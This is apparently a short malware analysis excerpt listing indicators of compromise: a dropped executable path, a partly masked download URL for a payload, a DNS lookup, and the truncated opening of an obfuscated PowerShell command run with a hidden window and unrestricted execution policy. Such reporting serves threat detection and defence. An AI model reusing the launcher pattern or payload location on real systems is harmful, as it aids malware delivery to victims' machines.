Technical Information
- C:\users\public\zdt.exe
- http://fu###.#eadyfreights.com/youuth.exe
- DNS ASK fu###.#eadyfreights.com
- 'C:\users\public\zdt.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -Window 1 [void] $null;$eosbzmhlyx = Get-Random -Min 3 -Max 4;$guylbonzvxs = ([char[]]([char]97..[char]122));$fgjyxli = -join ($guylbonzvxs | Get-Random -Count $eo...' (with hidden window)